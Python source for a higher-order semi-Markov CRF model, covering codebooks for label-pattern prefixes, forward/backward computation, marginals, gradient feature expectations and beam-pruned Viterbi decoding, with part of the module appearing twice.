fpotential_perboundary[u, v] = f_potential
for pi in pi_pky_map:
if j >= P_len[pi]:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + alpha[u - 1, pk_c_list]
accumulator[pi_c, d] = vectorized_logsumexp(vec)
for pi in pi_pky_map:
if j >= P_len[pi]:
pi_c = P_codebook[pi]
if L > 1:
alpha[j, pi_c] = vectorized_logsumexp(accumulator[pi_c, :])
else:
alpha[j, pi_c] = accumulator[pi_c, 0]
self.seqs_info[seq_id]["fpotential"] = fpotential_perboundary
return alpha
def compute_backward_vec(self, w, seq_id):
"""compute the backward matrix (beta matrix)
Args:
w: weight vector (numpy vector)
seq_id: integer representing unique id assigned to the sequence
.. note::
fpotential per boundary dictionary should be available in :attr:`seqs.info`
"""
model = self.model
pi_pky_map = model.pi_pky_map
P_codebook = model.P_codebook
len_P = len(P_codebook)
T = self.seqs_info[seq_id]["T"]
L = model.L
fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
beta = numpy.ones((T + 2, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
beta[T + 1, :] = 0
for j in reversed(range(1, T + 1)):
accum_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
for d in range(L):
track_comp = numpy.ones((len_P, len_P), dtype="longdouble") * (
-numpy.inf
)
u = j
v = j + d
if v > T:
break
f_potential = fpotential_perboundary[u, v]
for pi in pi_pky_map:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + beta[v + 1, pi_c]
track_comp[pk_c_list, pi_c] = vec
for p_c in P_codebook.values():
accum_mat[p_c, d] = vectorized_logsumexp(track_comp[p_c, :])
for p_c in P_codebook.values():
beta[u, p_c] = vectorized_logsumexp(accum_mat[p_c, :])
return beta
def compute_marginals(self, seq_id):
""" compute the marginal (i.e. probability of each y pattern at each position)
Args:
seq_id: integer representing unique id assigned to the sequence
.. note::
- fpotential per boundary dictionary should be available in :attr:`seqs.info`
- alpha matrix should be available in :attr:`seqs.info`
- beta matrix should be available in :attr:`seqs.info`
- Z (i.e. P(x)) should be available in :attr:`seqs.info`
"""
model = self.model
Z_codebook = model.Z_codebook
z_pi_piy = model.z_pi_piy_map
T = self.seqs_info[seq_id]["T"]
L = self.model.L
alpha = self.seqs_info[seq_id]["alpha"]
beta = self.seqs_info[seq_id]["beta"]
Z = self.seqs_info[seq_id]["Z"]
fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
P_marginals = numpy.zeros(
(L, T + 1, len(self.model.Z_codebook)), dtype="longdouble"
)
for j in range(1, T + 1):
for d in range(L):
u = j
v = j + d
if v > T:
break
boundary = (u, v)
f_potential = fpotential_perboundary[boundary]
for z in Z_codebook:
pi_c, piy_c, pk_c = z_pi_piy[z]
numerator = (
alpha[u - 1, pi_c] + f_potential[piy_c] + beta[v + 1, pk_c]
)
P_marginals[d, j, Z_codebook[z]] = numpy.exp(
vectorized_logsumexp(numerator) - Z
)
return P_marginals
def compute_feature_expectation(self, seq_id, P_marginals, grad):
"""compute the features expectations (i.e. expected count of the feature based on learned model)
Args:
seq_id: integer representing unique id assigned to the sequence
P_marginals: probability matrix for y patterns at each position in time
grad: numpy vector with dimension equal to the weight vector. It represents the gradient
that will be computed using the feature expectation and the global features of the sequence
.. note::
- activefeatures (per boundary) dictionary should be available in :attr:`seqs.info`
- P_marginal (marginal probability matrix) should be available in :attr:`seqs.info`
"""
activefeatures = self.seqs_info[seq_id]["activefeatures"]
Z_codebook = self.model.Z_codebook
for boundary, features_dict in activefeatures.items():
u, v = boundary
d = v - u
for z_patt in features_dict:
w_indx, f_val = features_dict[z_patt]
grad[w_indx] += f_val * P_marginals[d, u, Z_codebook[z_patt]]
def prune_states(self, score_vec, beam_size):
"""prune states that fall off the specified beam size
Args:
score_vec: score matrix
beam_size: specified size of the beam (integer)
"""
P_codebook_rev = self.model.P_codebook_rev
P_elems = self.model.P_elems
# using argpartition as better alternative to argsort
indx_partitioned_pi = numpy.argpartition(-score_vec, beam_size)
# identify top-k states/pi
indx_topk_pi = indx_partitioned_pi[:beam_size]
# get topk states
topk_pi = {P_codebook_rev[indx] for indx in indx_topk_pi}
topk_states = {P_elems[pi][-1] for pi in topk_pi}
return topk_states
def viterbi(self, w, seq_id, beam_size, stop_off_beam=False, y_ref=[], K=1):
"""decode sequences using viterbi decoder
Args:
w: weight vector (numpy vector)
seq_id: integer representing unique id assigned to the sequence
beam_size: integer representing the size of the beam
Keyword Arguments:
stop_off_beam: boolean indicating if to stop when the reference state \
falls off the beam (used in perceptron/search based learning)
y_ref: reference sequence list of labels (used while learning)
K: integer indicating number of decoded sequences required (i.e. top-k list)
A* searcher with viterbi will be used to generate k-decoded list
"""
model = self.model
P_elems = model.P_elems
pi_pky_map = model.pi_pky_map
P_codebook = model.P_codebook
P_codebook_rev = model.P_codebook_rev
L = model.L
len_P = len(P_codebook)
num_states = model.num_states
T = self.seqs_info[seq_id]["T"]
# records max score at every time step
delta = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
pi_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
# the score for the empty sequence at time 0 is 1
delta[0, P_codebook[""]] = 0
back_track = {}
# records where violation occurs -- it is 1-based indexing
viol_index = []
if beam_size == num_states:
# case of exact search and decoding
l = {}
l["activefeatures"] = (seq_id,)
self.check_cached_info(seq_id, l)
active_features = self.seqs_info[seq_id]["activefeatures"]
for j in range(1, T + 1):
# reset pi_mat at every loop
pi_mat.fill(-numpy.inf)
backpointer = {}
for d in range(L):
u = j - d
if u <= 0:
break
v = j
boundary = (u, v)
# vector of size len(pky)
f_potential = self.compute_fpotential(w, active_features[boundary])
for pi in pi_pky_map:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
# print("f_potential[pky_c_list] ", f_potential[pky_c_list])
# print("delta[u-1, pk_c_list] ", delta[u-1, pk_c_list])
# print("vec ", vec)
pi_mat[pi_c, d] = numpy.max(vec)
argmax_indx = numpy.argmax(vec)
# print("argmax chosen ", argmax_ind)
pk_c_max = pk_c_list[argmax_indx]
# print('pk_c ', pk_c)
pk = P_codebook_rev[pk_c_max]
y = P_elems[pk][-1]
backpointer[d, pi_c] = (pk_c_max, y)
# print("backpointer ")
# print(backpointer)
# print("pi_mat")
# print(pi_mat)
# get the max for each pi across all segment lengths
for pi in pi_pky_map:
pi_c = P_codebook[pi]
delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
argmax_indx = numpy.argmax(pi_mat[pi_c, :])
pk_c, y = backpointer[argmax_indx, pi_c]
back_track[j, pi_c] = (argmax_indx, pk_c, y)
# print("delta ")
# print(delta)
# print("backtrack ")
# print(back_track)
else:
# case of inexact search and decoding
l = {}
l["seg_features"] = (seq_id,)
self.check_cached_info(seq_id, l)
# tracks active states by boundary
accum_activestates = {}
for j in range(1, T + 1):
# reset pi_mat at every loop
pi_mat.fill(-numpy.inf)
backpointer = {}
for d in range(L):
u = j - d
if u <= 0:
break
v = j
boundary = (u, v)
active_features = self.identify_activefeatures(
seq_id, boundary, accum_activestates
)
# vector of size len(pky)
f_potential = self.compute_fpotential(w, active_features)
for pi in pi_pky_map:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
pi_mat[pi_c, d] = numpy.max(vec)
argmax_indx = numpy.argmax(vec)
# print("argmax chosen ", argmax_ind)
pk_c_max = pk_c_list[argmax_indx]
# print('pk_c ', pk_c)
pk = P_codebook_rev[pk_c_max]
y = P_elems[pk][-1]
backpointer[d, pi_c] = (pk_c_max, y)
topk_states = self.prune_states(pi_mat[:, d], beam_size)
# update tracked active states -- to consider renaming it
accum_activestates[boundary] = accum_activestates[
boundary
].intersection(topk_states)
# get the max for each pi across all segment lengths
for pi in pi_pky_map:
pi_c = P_codebook[pi]
delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
argmax_indx = numpy.argmax(pi_mat[pi_c, :])
pk_c, y = backpointer[argmax_indx, pi_c]
back_track[j, pi_c] = (argmax_indx, pk_c, y)
# in case we are using viterbi for learning
if y_ref:
topk_states = self.prune_states(delta[j, :], beam_size)
if y_ref[j - 1] not in topk_states:
viol_index.append(j)
if stop_off_beam:
T = j
break
if K == 1:
# decoding the sequence
Y_decoded = []
p_T_c = numpy.argmax(delta[T, :])
p_T = P_codebook_rev[p_T_c]
y_T = P_elems[p_T][-1]
d, pt_c, yt = back_track[T, p_T_c]
for _ in range(d + 1):
Y_decoded.append(y_T)
t = T - d - 1
while t > 0:
new_d, new_pt_c, new_yt = back_track[t, pt_c]
for _ in range(new_d + 1):
Y_decoded.append(yt)
t = t - new_d - 1
pt_c = new_pt_c
yt = new_yt
Y_decoded.reverse()
# print("y_decoded ", Y_decoded)
return (Y_decoded, viol_index)
else:
asearcher = HOSemi_AStarSearcher(P_codebook_rev, P_elems)
topK = asearcher.search(delta, back_track, T, K)
# print('topk ', topK)
return (topK, viol_index)
if __name__ == "__main__":
pass
|
"""
@author: <NAME> <<EMAIL>>
"""
import numpy
from .linear_chain_crf import LCRFModelRepresentation, LCRF
from .utilities import (
HOSemi_AStarSearcher,
vectorized_logsumexp,
generate_partitions,
generate_partition_boundaries,
)
class HOSemiCRFADModelRepresentation(LCRFModelRepresentation):
r"""Model representation that will hold data structures to be used in :class:`HOSemiCRF` class
Attributes:
P_codebook: set of proper prefixes of the elements in the set of patterns :attr:`Z_codebook`
e.g. {'':0, 'P':1, 'L':2, 'O':3, 'L|O':4, ...}
P_codebook_rev: reversed codebook of :attr:`P_codebook`
e.g. {0:'', 1:'P', 2:'L', 3:'O', 4:'L|O', ...}
P_len: dictionary comprising the length (i.e. number of elements) of elements in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':2, ...}
P_elems: dictionary comprising the composing elements of every prefix in :attr:`P_codebook`
e.g. {'':('',), 'P':('P',), 'L':('L',), 'O':('O',), 'L|O':('L','O'), ...}
P_numchar: dictionary comprising the number of characters for every prefix in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':3, ...}
f_transition: a dictionary representing forward transition data structure having the form:
{pi:{pky, (pk, y)}} where pi represents the longest prefix element in :attr:`P_codebook`
for pky (representing the concatenation of elements in :attr:`P_codebook` and :attr:`Y_codebook`)
pky_codebook: generate a codebook for the elements of the set PY (the product of set P and Y)
pi_pky_map: a map between P elements and PY elements
z_pky_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:[pky_elements]}
z_pi_piy_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:(pk, pky, pi)}
"""
def __init__(self):
# call super class
super().__init__()
self.P_codebook = None
self.P_codebook_rev = None
self.P_len = None
self.P_elems = None
self.P_numchar = None
self.f_transition = None
self.pky_codebook = None
self.pi_pky_map = None
self.z_pky_map = None
self.z_pi_piy_map = None
def setup_model(self, modelfeatures, states, L):
"""setup and create the model representation
Creates all maps and codebooks needed by the :class:`HOSemiCRFAD` class
Args:
modelfeatures: set of features defining the model
states: set of states (i.e. tags)
L: length of longest segment
"""
super().setup_model(modelfeatures, states, L)
def generate_instance_properties(self):
"""generate instance properties that will be later used by :class:`HOSemiCRFAD` class
"""
super().generate_instance_properties()
self.P_codebook = self.get_forward_states()
self.P_codebook_rev = self.get_P_codebook_rev()
self.P_len, self.P_elems, self.P_numchar = self.get_P_info()
self.f_transition = self.get_forward_transition()
self.pky_codebook = self.get_pky_codebook()
self.pi_pky_map = self.get_pi_pky_map()
self.z_pky_map, self.z_pi_piy_map = self.map_pky_z()
def get_forward_states(self):
"""create set of forward states (referred to set P) and map each element to unique code
P is set of proper prefixes of the elements in :attr:`Z_codebook` set
"""
Y_codebook = self.Y_codebook
Z_elems = self.Z_elems
Z_len = self.Z_len
P = {}
for z_patt in Z_elems:
elems = Z_elems[z_patt]
z_len = Z_len[z_patt]
for i in range(z_len - 1):
P["|".join(elems[: i + 1])] = 1
for y in Y_codebook:
P[y] = 1
# empty element
P[""] = 1
P_codebook = {s: i for (i, s) in enumerate(P)}
# print("P_codebook ", P_codebook)
return P_codebook
def get_P_codebook_rev(self):
"""generate reversed codebook of :attr:`P_codebook`
"""
P_codebook = self.P_codebook
P_codebook_rev = {code: pi for pi, code in P_codebook.items()}
return P_codebook_rev
def get_P_info(self):
"""get the properties of P set (proper prefixes)
"""
P_codebook = self.P_codebook
P_len = {}
P_numchar = {}
P_elems = {}
for pi in P_codebook:
elems = pi.split("|")
P_elems[pi] = elems
if pi == "":
P_len[pi] = 0
P_numchar[pi] = 0
else:
P_len[pi] = len(elems)
P_numchar[pi] = len(pi)
return (P_len, P_elems, P_numchar)
def get_forward_transition(self):
"""generate forward transition data structure
Main tasks:
- create a set PY from the product of P and Y sets
- for each element in PY, determine the longest suffix existing in set P
- include all this info in :attr:`f_transition` dictionary
"""
Y_codebook = self.Y_codebook
P_codebook = self.P_codebook
P_numchar = self.P_numchar
Z_numchar = self.Z_numchar
# pk_y= {}
# for p in P_codebook:
# for y in Y_codebook:
# pk_y[(p, y)] = 1
pk_y = {(p, y) for p in P_codebook for y in Y_codebook}
pk_y_suffix = {}
for p in P_codebook:
if p != "":
len_p = P_numchar[p]
for (pk, y) in pk_y:
ref_str = pk + "|" + y
if pk == "":
len_ref = Z_numchar[y] + 1
else:
len_ref = P_numchar[pk] + Z_numchar[y] + 1
start_pos = len_ref - len_p
if start_pos >= 0:
# check suffix relation
check = ref_str[start_pos:] == p
# check = self.check_suffix(p, ref_str)
if check:
if (pk, y) in pk_y_suffix:
pk_y_suffix[(pk, y)].append(p)
else:
pk_y_suffix[(pk, y)] = [p]
pk_y_suffix = self.keep_longest_elems(pk_y_suffix)
f_transition = {}
for (pk, y), pi in pk_y_suffix.items():
if pk == "":
elmkey = y
else:
elmkey = pk + "|" + y
if pi in f_transition:
f_transition[pi][elmkey] = (pk, y)
else:
f_transition[pi] = {elmkey: (pk, y)}
# print("f_transition ", f_transition)
return f_transition
def get_pky_codebook(self):
"""generate a codebook for the elements of the set PY (the product of set P and Y)
"""
f_transition = self.f_transition
pky_codebook = {}
counter = 0
for pi in f_transition:
for pky in f_transition[pi]:
pky_codebook[pky] = counter
counter += 1
return pky_codebook
def map_pky_z(self):
"""generate a map between elements of the Z set and PY set"""
f_transition = self.f_transition
Z_codebook = self.Z_codebook
# given that we demand to have a unigram label features then Z set will always contain Y elems
Z_numchar = self.Z_numchar
P_numchar = self.P_numchar
pky_codebook = self.pky_codebook
P_codebook = self.P_codebook
z_pi_piy = {}
z_pky = {}
for pi in f_transition:
for pky, pk_y_tup in f_transition[pi].items():
pk, y = pk_y_tup
# get number of characters in the pky
if pk == "":
len_pky = Z_numchar[y]
else:
# +1 is for the separator '|'
len_pky = P_numchar[pk] + Z_numchar[y] + 1
for z in Z_codebook:
len_z = Z_numchar[z]
# check suffix relation
start_pos = len_pky - len_z
if start_pos >= 0:
check = pky[start_pos:] == z
if check:
pky_c = pky_codebook[pky]
pk_c = P_codebook[pk]
if z in z_pky:
z_pky[z].append(pky_c)
z_pi_piy[z][0].append(pk_c)
z_pi_piy[z][1].append(pky_c)
z_pi_piy[z][2].append(P_codebook[pi])
else:
z_pky[z] = [pky_c]
z_pi_piy[z] = ([pk_c], [pky_c], [P_codebook[pi]])
return (z_pky, z_pi_piy)
def get_pi_pky_map(self):
""" generate map between P elements and PY elements
Main tasks:
- for every element in PY, determine the longest suffix in P
- determine the two components in PY (i.e. p and y element)
- represent this info in a dictionary that will be used for forward/alpha matrix
"""
f_transition = self.f_transition
pky_codebook = self.pky_codebook
P_codebook = self.P_codebook
pi_pky_map = {}
for pi in f_transition:
pi_pky_map[pi] = [[], []]
for pky, (pk, __) in f_transition[pi].items():
pi_pky_map[pi][0].append(pky_codebook[pky])
pi_pky_map[pi][1].append(P_codebook[pk])
# convert list to numpy arrays
# for i in range(2):
# pi_pky_map[pi][i] = numpy.array(pi_pky_map[pi][i])
# pi_pky_map[pi] = tuple(pi_pky_map[pi])
return pi_pky_map
def filter_activated_states(
self, activated_states, accum_active_states, curr_boundary
):
"""filter/prune states and y features
Args:
activaed_states: dictionary containing possible active states/y features
it has the form {patt_len:{patt_1, patt_2, ...}}
accum_active_states: dictionary of only possible active states by position
it has the form {pos_1:{state_1, state_2, ...}}
boundary: tuple (u,v) representing the current boundary in the sequence
"""
Z_elems = self.Z_elems
filtered_activestates = {}
# generate partition boundaries
depth_node_map = {}
generate_partitions(
curr_boundary, self.L, self.max_patt_len, {}, depth_node_map, None
)
partition_boundaries = generate_partition_boundaries(depth_node_map)
for z_len in activated_states:
if z_len == 1:
continue
if z_len in partition_boundaries:
partitions = partition_boundaries[z_len]
filtered_activestates[z_len] = set()
for partition in partitions:
for z_patt in activated_states[z_len]:
check = True
zelems = Z_elems[z_patt]
for i in range(z_len):
bound = partition[i]
if zelems[i] not in accum_active_states[bound]:
check = False
break
if check:
filtered_activestates[z_len].add(z_patt)
return filtered_activestates
class HOSemiCRFAD(LCRF):
"""higher-order semi-CRF model that uses algorithmic differentiation in gradient computation
Args:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
seqs_representer: an instance of :class:`SeqsRepresenter` class
seqs_info: dictionary holding sequences info
Keyword Arguments:
load_info_fromdisk: integer from 0 to 5 specifying number of cached data
to be kept in memory. 0 means keep everything while
5 means load everything from disk
Attributes:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
weights: a numpy vector representing feature weights
seqs_representer: an instance of :class:`pyseqlab.feature_extraction.SeqsRepresenter` class
seqs_info: dictionary holding sequences info
beam_size: determines the size of the beam for state pruning
fun_dict: a function map
def_cached_entities: a list of the names of cached entities sorted (descending)
based on estimated space required in memory
"""
def __init__(self, model, seqs_representer, seqs_info, load_info_fromdisk=5):
super().__init__(model, seqs_representer, seqs_info, load_info_fromdisk)
def cached_entitites(self, load_info_fromdisk):
"""construct list of names of cached entities in memory
"""
def_cached_entities = super().cached_entitites(load_info_fromdisk)
inmemory_info = ["alpha", "Z", "beta", "fpotential"]
def_cached_entities += inmemory_info
return def_cached_entities
def compute_fpotential(self, w, active_features):
"""compute the potential of active features in a specified boundary
Args:
w: weight vector (numpy vector)
active_features: dictionary of activated features in a specified boundary
"""
model = self.model
pky_codebook = model.pky_codebook
z_pky_map = model.z_pky_map
f_potential = numpy.zeros(len(pky_codebook))
# to consider caching the w_indx and fval as in cached_pf
for z in active_features:
w_indx, f_val = active_features[z]
potential = numpy.dot(w[w_indx], f_val)
# get all pky's in coded format where z maintains a suffix relation with them
pky_c_list = z_pky_map[z]
f_potential[pky_c_list] += potential
return f_potential
def compute_forward_vec(self, w, seq_id):
"""compute the forward matrix (alpha matrix)
Args:
w: weight vector (numpy vector)
seq_id: integer representing unique id assigned to the sequence
.. note::
activefeatures need to be loaded first in :attr:`seqs.info`
"""
model = self.model
pi_pky_map = model.pi_pky_map
P_len = model.P_len
P_codebook = model.P_codebook
T = self.seqs_info[seq_id]["T"]
L = self.model.L
activefeatures = self.seqs_info[seq_id]["activefeatures"]
alpha = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
alpha[0, P_codebook[""]] = 0
fpotential_perboundary = {}
for j in range(1, T + 1):
accumulator = (
numpy.ones((len(P_codebook), L), dtype="longdouble") * -numpy.inf
)
for d in range(L):
u = j - d
if u <= 0:
break
v = j
f_potential = self.compute_fpotential(w, activefeatures[u, v])
fpotential_perboundary[u, v] = f_potential
for pi in pi_pky_map:
if j >= P_len[pi]:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + alpha[u - 1, pk_c_list]
accumulator[pi_c, d] = vectorized_logsumexp(vec)
for pi in pi_pky_map:
if j >= P_len[pi]:
pi_c = P_codebook[pi]
if L > 1:
alpha[j, pi_c] = vectorized_logsumexp(accumulator[pi_c, :])
else:
alpha[j, pi_c] = accumulator[pi_c, 0]
self.seqs_info[seq_id]["fpotential"] = fpotential_perboundary
return alpha
def compute_backward_vec(self, w, seq_id):
"""compute the backward matrix (beta matrix)
Args:
w: weight vector (numpy vector)
seq_id: integer representing unique id assigned to the sequence
.. note::
fpotential per boundary dictionary should be available in :attr:`seqs.info`
"""
model = self.model
pi_pky_map = model.pi_pky_map
P_codebook = model.P_codebook
len_P = len(P_codebook)
T = self.seqs_info[seq_id]["T"]
L = model.L
fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
beta = numpy.ones((T + 2, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
beta[T + 1, :] = 0
for j in reversed(range(1, T + 1)):
accum_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
for d in range(L):
track_comp = numpy.ones((len_P, len_P), dtype="longdouble") * (
-numpy.inf
)
u = j
v = j + d
if v > T:
break
f_potential = fpotential_perboundary[u, v]
for pi in pi_pky_map:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + beta[v + 1, pi_c]
track_comp[pk_c_list, pi_c] = vec
for p_c in P_codebook.values():
accum_mat[p_c, d] = vectorized_logsumexp(track_comp[p_c, :])
for p_c in P_codebook.values():
beta[u, p_c] = vectorized_logsumexp(accum_mat[p_c, :])
return beta
def compute_marginals(self, seq_id):
""" compute the marginal (i.e. probability of each y pattern at each position)
Args:
seq_id: integer representing unique id assigned to the sequence
.. note::
- fpotential per boundary dictionary should be available in :attr:`seqs.info`
- alpha matrix should be available in :attr:`seqs.info`
- beta matrix should be available in :attr:`seqs.info`
- Z (i.e. P(x)) should be available in :attr:`seqs.info`
"""
model = self.model
Z_codebook = model.Z_codebook
z_pi_piy = model.z_pi_piy_map
T = self.seqs_info[seq_id]["T"]
L = self.model.L
alpha = self.seqs_info[seq_id]["alpha"]
beta = self.seqs_info[seq_id]["beta"]
Z = self.seqs_info[seq_id]["Z"]
fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
P_marginals = numpy.zeros(
(L, T + 1, len(self.model.Z_codebook)), dtype="longdouble"
)
for j in range(1, T + 1):
for d in range(L):
u = j
v = j + d
if v > T:
break
boundary = (u, v)
f_potential = fpotential_perboundary[boundary]
for z in Z_codebook:
pi_c, piy_c, pk_c = z_pi_piy[z]
numerator = (
alpha[u - 1, pi_c] + f_potential[piy_c] + beta[v + 1, pk_c]
)
P_marginals[d, j, Z_codebook[z]] = numpy.exp(
vectorized_logsumexp(numerator) - Z
)
return P_marginals
def compute_feature_expectation(self, seq_id, P_marginals, grad):
"""compute the features expectations (i.e. expected count of the feature based on learned model)
Args:
seq_id: integer representing unique id assigned to the sequence
P_marginals: probability matrix for y patterns at each position in time
grad: numpy vector with dimension equal to the weight vector. It represents the gradient
that will be computed using the feature expectation and the global features of the sequence
.. note::
- activefeatures (per boundary) dictionary should be available in :attr:`seqs.info`
- P_marginal (marginal probability matrix) should be available in :attr:`seqs.info`
"""
activefeatures = self.seqs_info[seq_id]["activefeatures"]
Z_codebook = self.model.Z_codebook
for boundary, features_dict in activefeatures.items():
u, v = boundary
d = v - u
for z_patt in features_dict:
w_indx, f_val = features_dict[z_patt]
grad[w_indx] += f_val * P_marginals[d, u, Z_codebook[z_patt]]
def prune_states(self, score_vec, beam_size):
"""prune states that fall off the specified beam size
Args:
score_vec: score matrix
beam_size: specified size of the beam (integer)
"""
P_codebook_rev = self.model.P_codebook_rev
P_elems = self.model.P_elems
# using argpartition as better alternative to argsort
indx_partitioned_pi = numpy.argpartition(-score_vec, beam_size)
# identify top-k states/pi
indx_topk_pi = indx_partitioned_pi[:beam_size]
# get topk states
topk_pi = {P_codebook_rev[indx] for indx in indx_topk_pi}
topk_states = {P_elems[pi][-1] for pi in topk_pi}
return topk_states
def viterbi(self, w, seq_id, beam_size, stop_off_beam=False, y_ref=[], K=1):
"""decode sequences using viterbi decoder
Args:
w: weight vector (numpy vector)
seq_id: integer representing unique id assigned to the sequence
beam_size: integer representing the size of the beam
Keyword Arguments:
stop_off_beam: boolean indicating if to stop when the reference state \
falls off the beam (used in perceptron/search based learning)
y_ref: reference sequence list of labels (used while learning)
K: integer indicating number of decoded sequences required (i.e. top-k list)
A* searcher with viterbi will be used to generate k-decoded list
"""
model = self.model
P_elems = model.P_elems
pi_pky_map = model.pi_pky_map
P_codebook = model.P_codebook
P_codebook_rev = model.P_codebook_rev
L = model.L
len_P = len(P_codebook)
num_states = model.num_states
T = self.seqs_info[seq_id]["T"]
# records max score at every time step
delta = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
pi_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
# the score for the empty sequence at time 0 is 1
delta[0, P_codebook[""]] = 0
back_track = {}
# records where violation occurs -- it is 1-based indexing
viol_index = []
if beam_size == num_states:
# case of exact search and decoding
l = {}
l["activefeatures"] = (seq_id,)
self.check_cached_info(seq_id, l)
active_features = self.seqs_info[seq_id]["activefeatures"]
for j in range(1, T + 1):
# reset pi_mat at every loop
pi_mat.fill(-numpy.inf)
backpointer = {}
for d in range(L):
u = j - d
if u <= 0:
break
v = j
boundary = (u, v)
# vector of size len(pky)
f_potential = self.compute_fpotential(w, active_features[boundary])
for pi in pi_pky_map:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
# print("f_potential[pky_c_list] ", f_potential[pky_c_list])
# print("delta[u-1, pk_c_list] ", delta[u-1, pk_c_list])
# print("vec ", vec)
pi_mat[pi_c, d] = numpy.max(vec)
argmax_indx = numpy.argmax(vec)
# print("argmax chosen ", argmax_ind)
pk_c_max = pk_c_list[argmax_indx]
# print('pk_c ', pk_c)
pk = P_codebook_rev[pk_c_max]
y = P_elems[pk][-1]
backpointer[d, pi_c] = (pk_c_max, y)
# print("backpointer ")
# print(backpointer)
# print("pi_mat")
# print(pi_mat)
# get the max for each pi across all segment lengths
for pi in pi_pky_map:
pi_c = P_codebook[pi]
delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
argmax_indx = numpy.argmax(pi_mat[pi_c, :])
pk_c, y = backpointer[argmax_indx, pi_c]
back_track[j, pi_c] = (argmax_indx, pk_c, y)
# print("delta ")
# print(delta)
# print("backtrack ")
# print(back_track)
else:
# case of inexact search and decoding
l = {}
l["seg_features"] = (seq_id,)
self.check_cached_info(seq_id, l)
# tracks active states by boundary
accum_activestates = {}
for j in range(1, T + 1):
# reset pi_mat at every loop
pi_mat.fill(-numpy.inf)
backpointer = {}
for d in range(L):
u = j - d
if u <= 0:
break
v = j
boundary = (u, v)
active_features = self.identify_activefeatures(
seq_id, boundary, accum_activestates
)
# vector of size len(pky)
f_potential = self.compute_fpotential(w, active_features)
for pi in pi_pky_map:
pi_c = P_codebook[pi]
pky_c_list, pk_c_list = pi_pky_map[pi]
vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
pi_mat[pi_c, d] = numpy.max(vec)
argmax_indx = numpy.argmax(vec)
# print("argmax chosen ", argmax_ind)
pk_c_max = pk_c_list[argmax_indx]
# print('pk_c ', pk_c)
pk = P_codebook_rev[pk_c_max]
y = P_elems[pk][-1]
backpointer[d, pi_c] = (pk_c_max, y)
topk_states = self.prune_states(pi_mat[:, d], beam_size)
# update tracked active states -- to consider renaming it
accum_activestates[boundary] = accum_activestates[
boundary
].intersection(topk_states)
# get the max for each pi across all segment lengths
for pi in pi_pky_map:
pi_c = P_codebook[pi]
delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
argmax_indx = numpy.argmax(pi_mat[pi_c, :])
pk_c, y = backpointer[argmax_indx, pi_c]
back_track[j, pi_c] = (argmax_indx, pk_c, y)
# in case we are using viterbi for learning
if y_ref:
topk_states = self.prune_states(delta[j, :], beam_size)
if y_ref[j - 1] not in topk_states:
viol_index.append(j)
if stop_off_beam:
T = j
break
if K == 1:
# decoding the sequence
Y_decoded = []
p_T_c = numpy.argmax(delta[T, :])
p_T = P_codebook_rev[p_T_c]
y_T = P_elems[p_T][-1]
d, pt_c, yt = back_track[T, p_T_c]
for _ in range(d + 1):
Y_decoded.append(y_T)
t = T - d - 1
while t > 0:
new_d, new_pt_c, new_yt = back_track[t, pt_c]
for _ in range(new_d + 1):
Y_decoded.append(yt)
t = t - new_d - 1
pt_c = new_pt_c
yt = new_yt
Y_decoded.reverse()
# print("y_decoded ", Y_decoded)
return (Y_decoded, viol_index)
else:
asearcher = HOSemi_AStarSearcher(P_codebook_rev, P_elems)
topK = asearcher.search(delta, back_track, T, K)
# print('topk ', topK)
return (topK, viol_index)
if __name__ == "__main__":
pass
|
en
| 0.716332
|
